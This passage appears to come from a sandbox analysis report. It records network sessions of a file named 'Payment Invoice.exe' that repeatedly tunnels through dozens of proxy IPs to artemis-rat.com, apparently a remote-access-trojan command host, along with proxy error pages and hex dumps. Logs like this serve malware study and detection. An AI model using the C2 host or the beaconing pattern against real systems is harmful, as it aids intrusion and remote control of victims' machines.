                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.323573112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.823575020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.186912060 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                799192.168.2.452336202.40.181.220312477076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.691557884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                800192.168.2.452471156.67.217.159807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.691627026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.028816938 CET327INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                801192.168.2.449982170.239.205.19997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.692348003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.792254925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.886424065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.946512938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.068736076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.089210033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.089251995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:30.089253902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:18.214287043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                802192.168.2.450052179.43.8.1680887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.692595959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.704687119 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                803192.168.2.45012623.225.72.12235007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.693942070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.823894024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.824636936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.824265003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.824068069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                804192.168.2.452429188.132.222.580807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.694540024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.559024096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.727530003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.131284952 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                805192.168.2.451620162.215.219.157416977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.696014881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                806192.168.2.452491103.200.135.22941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.701426029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                807192.168.2.452391116.199.168.141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.701498985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                808192.168.2.450012125.99.106.25031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.703234911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.792435884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.230515003 CET1286INHTTP/1.1 503 Service Unavailable
                                                                Server: squid/4.15
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 3894
                                                                X-Squid-Error: ERR_DNS_FAIL 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2021 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                809192.168.2.45142249.249.155.3807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.703377962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.676209927 CET536INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                Content-Length: 614
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                Mar 11, 2024 16:15:21.676266909 CET270INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 44


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                810192.168.2.4516678.210.8.157190017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.704190016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                811192.168.2.450005182.140.244.16381187076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.707461119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                812192.168.2.45150341.223.234.116372597076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.709093094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                813192.168.2.452373106.105.218.244807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.709711075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                814192.168.2.45251652.151.210.20490007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.718703985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                815192.168.2.450138138.0.143.12880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.722306013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.823930025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.438683033 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                816192.168.2.4525765.161.108.724437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.743745089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                817192.168.2.4525785.161.108.724437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.744493961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                818192.168.2.4525815.161.108.724437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.746570110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                819192.168.2.45251514.103.26.5380007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.766843081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                820192.168.2.45013762.171.133.6631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.768237114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.792570114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.886420965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.455379009 CET39INHTTP/1.1 200 Connection established
